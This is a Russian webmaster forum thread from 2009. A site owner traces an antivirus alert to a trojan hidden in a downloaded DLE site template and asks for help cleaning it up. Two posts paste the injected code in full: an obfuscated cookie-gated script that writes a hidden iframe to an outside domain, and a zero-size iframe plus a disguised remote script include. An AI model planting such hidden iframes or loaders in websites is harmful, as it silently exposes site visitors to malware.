X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Троян Heur:trojan.script.iframer
PahA
PahA
Topic Starter сообщение 20.8.2009, 13:09; Ответить: PahA
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 397
Регистрация: 12.6.2008
Поблагодарили: 48 раз
Репутация:   6  


Сегодня захожу на свой сайт и касперский меня вежливо предупреждает о HEUR:Trojan.Script.Iframer
И что за зверь и как его лечить? И как его найти.

20.08.2009 10:13:53 _http://site.ru/favicon.ico Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:53 _http://site.ru/favicon.ico//favicon Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:53 _http://site.ru/favicon.ico//favicon Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/favicon.ico Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/favicon.ico//favicon Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/favicon.ico//favicon Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/templates/dizz/images/m-bottom.gife Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/templates/dizz/images/m-bottom.gife//m-bottom Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/templates/dizz/images/m-bottom.gife//m-bottom Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/templates/dizz/images/h1bg.gif Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/templates/dizz/images/h1bg.gif//h1bg Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:50 _http://site.ru/templates/dizz/images/h1bg.gif//h1bg Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:49 _http://site.ru/templates/dizz/images/m-center.gife Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:49 _http://site.ru/templates/dizz/images/m-center.gife//m-center Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:49 _http://site.ru/templates/dizz/images/m-center.gife//m-center Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:49 _http://site.ru/templates/dizz/images/m-top.gife Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:49 __http://site.ru/templates/dizz/images/m-top.gife//m-top Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:49 __http://site.ru/templates/dizz/images/m-top.gife//m-top Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:48 __http://site.ru/css/site.css Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:48 __http://site.ru/css/site.css//site Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:48 __http://site.ru/css/site.css//site Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/css/style.css Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/css/style.css//style Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/css/style.css//style Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/css/engine.css Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/css/engine.css//engine Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/css/engine.css//engine Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/templates/dizz/css/template_css.css Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/templates/dizz/css/template_css.css//template_css Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:47 __http://site.ru/templates/dizz/css/template_css.css//template_css Firefox Обнаружено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:46 __http://site.ru/ Firefox Ошибка обработки: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:46 __http://site.ru///porno-x-online Firefox Запрещено: HEUR:Trojan.Script.Iframer
20.08.2009 10:13:46 __http://site.ru///porno-x-online Firefox Обнаружено: HEUR:Trojan.Script.Iframer


Формат .gife для меня загадка нет таких файлов там на серваке. Тоже непонятно что такое там в папке такого нет template_css.css Этого тоже нет h1bg.gif., так как нету и favicon.ico


И самое главное при последующих заходах на сайт все было уже нормально. Даты изменения файлов старые, с тех пор как делал сайт. Загадка прям какая-то.


--------------------
Не нашел счастья в Яндексе? Ищи в Google! ;)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vidik
vidik
сообщение 20.8.2009, 13:11; Ответить: vidik
Сообщение #2


empty your mind
*****

Группа: Active User
Сообщений: 961
Регистрация: 14.12.2008
Поблагодарили: 190 раз
Репутация:   39  


.gife biggrin.gif

скачай сайт и проверь


--------------------
это подпись
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
jack
jack
сообщение 20.8.2009, 13:14; Ответить: jack
Сообщение #3


----------------
*******

Группа: Super Moderator
Сообщений: 7863
Регистрация: 22.3.2009
Из: глины
Поблагодарили: 10733 раза
Репутация:   591  


(vidik @ 20.8.2009, 12:11) *
.gife biggrin.gif

скачай сайт и проверь

И поменяй пароли, раз он был, а теперь нету...не мог же он сам по себе исчезнуть.


--------------------
Stimul-Cash и RX-Partners - лидеры фарма бизнеса!

Официальный канал MaulTalk в Telegram
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PahA
PahA
Topic Starter сообщение 20.8.2009, 13:16; Ответить: PahA
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 397
Регистрация: 12.6.2008
Поблагодарили: 48 раз
Репутация:   6  


Уже качаю...

Проверил, касперский ничего не нашел... сейчас качаю полный бэкап с сервака может там че есть.

Сообщение отредактировал PahA - 20.8.2009, 13:35


--------------------
Не нашел счастья в Яндексе? Ищи в Google! ;)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
toper
toper
сообщение 21.8.2009, 13:43; Ответить: toper
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 257
Регистрация: 19.8.2008
Поблагодарили: 269 раз
Репутация:   22  


Проверяйте файлы шаблонов, htacces. mod_rewrite рулит.
Файлы могут инклюдится с других сайтов. Судя по названия вируса - через фреймы.

p.S> никогда не сохраняйте свой пароль на ФТП! Если на вашем сайте оказался вирус, то может быть 2 варианта:
1. дыры в безопасности php, попросите програмера всё проверить, изучите логи аппача.
2. Ваш комп был заражен, пароль на ФТП был запомнен галочкой и соответственно попал к злоумышленнику. То что каспер ничего не видит - еще не факт, были случае когда вирусы заражали самого каспера. Так чт опрежде чем "лечить" вирус на сайте - проверьтесь сами, например с помощью avz.

p.p.s сделать всё надо быстро, иначе о трафике с поисковиков можно забыть, как и о трасте к домену.


--------------------
Короткая ссылка без индексации ботами | WebEffector - нереальная машина продвижения. | GGL - вечные ссылки под яшу | Генератор страниц с бэками
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
iBBi
iBBi
сообщение 21.8.2009, 14:23; Ответить: iBBi
Сообщение #6


Участник
***

Группа: User
Сообщений: 227
Регистрация: 20.8.2009
Поблагодарили: 31 раз
Репутация:   7  


у кого либо были данные от фтп? пароль от фтп хранили в фтп менеджере?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PahA
PahA
Topic Starter сообщение 22.8.2009, 17:36; Ответить: PahA
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 397
Регистрация: 12.6.2008
Поблагодарили: 48 раз
Репутация:   6  


Все нашел. Было в файле login.php

<script LANGUAGE="Javascript">
eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c]);return p}('l p(8){q=B.C;c(q){r=s(\'t\');c(r==7){6 d=D E();d.F(d.G()+(H*u*u*I));e(\'t\',\'1\',d,"/");9.J("<v K=\'L://M.N.O/P/Q.R\' S=\'T:U\'></v>");V.W()}}}l s(8){6 m=8+"=";6 w=m.n;6 x=9.f.n;6 i=0;X(i<x){6 j=i+w;c(9.f.Y(i,j)==m)y Z(j);i=9.f.10(" ",i)+1;c(i==0)11}y 7}l e(8,z){6 a=e.A;6 b=e.A.n;6 g=(b>2)?a[2]:7;6 h=(b>3)?a[3]:7;6 k=(b>4)?a[4]:7;6 o=(b>5)?a[5]:12;9.f=8+"="+13(z)+((g==7)?"":("; g="+g.14()))+((h==7)?"":("; h="+h))+((k==7)?"":("; k="+k))+((o==15)?"; o":"")}9.16=p(8);',62,69,'||||||var|null|name|document|argv|argc|if|ExpDate|SetCookie|cookie|expires|p
ath|||domain|function|arg|length|secure|PopShow3|CookieTest|ClickUndercookie|Get
C
ookie|clickunder|60|iframe|alen|clen|return|value|arguments|navigator|cookieEnab
l
ed|new|Date|setTime|getTime|48|1000|write|src|http|www|gameswar|ru|12345|stats|h
t
ml|style|display|none|window|focus|while|substring|getCookieVal|indexOf|break|fa
l
se|escape|toGMTString|true|onload'.split('|'),0,{}))
</SCRIPT>


Если кто расшифрует буду рад.


Все дело в шаблонах, поставил, шаблоны с сайта 8dle. Автор neoks, скачал три его рипа и во всех эта "радость".

З.Ы.: главное что когда ставил шаблон, или я не заметил, или просто не выходил из админки, или он только через определённое время работать начинает, так как он выводится только для незалогиненого юзера.

З.З.Ы.: нет, ну я еще понимаю копирайт поставить... я б его оставил, мне ж не жалко. А пихать Trojan.Script.Iframer не стоит.

З.З.Ы.: точнее во всех шаблонах neoks автора.

Сообщение отредактировал PahA - 22.8.2009, 17:46


--------------------
Не нашел счастья в Яндексе? Ищи в Google! ;)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fantom
fantom
сообщение 2.2.2010, 20:18; Ответить: fantom
Сообщение #8


Завсегдатай
*****


Группа: Active User
Сообщений: 562
Регистрация: 31.8.2008
Из: r030us
Поблагодарили: 67 раз
Репутация:   6  


<iframe style='position:absolute;left:-4%;width:0%;top:-5%;height:0%;' src='http://www.gameswar.ru/12345/stats.html'></iframe>
<script language="JavaScript">
var ifpc_id = "7220";
var ifpc_url = document.location;
var ifpc_rnd = Math.random();
document.write('<scr'+'ipt type="text/javascript" src="http://ifr'+'amepay.'+'com/t'+'ds/js.p'+'hp"></scr'+'ipt>');
</script></noindex>


у меня тоже в одном шаблоне такая шляпа))
подскажите где он может сидеть)


Поблагодарили: (0)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Требуется верстка на Shop-Script
6 MrLia 2360 15.8.2011, 16:14
автор: White_Lad
Открытая тема (нет новых ответов) [PHP]Walker SMS Script ver.4 - отправка смс с подменой номера
Скрипт автоматизированного сервиса по отправке смс с подменой номера&#
5 Walker 3660 4.1.2011, 1:50
автор: Zol


 



RSS Текстовая версия Сейчас: 13.12.2017, 15:20
Дизайн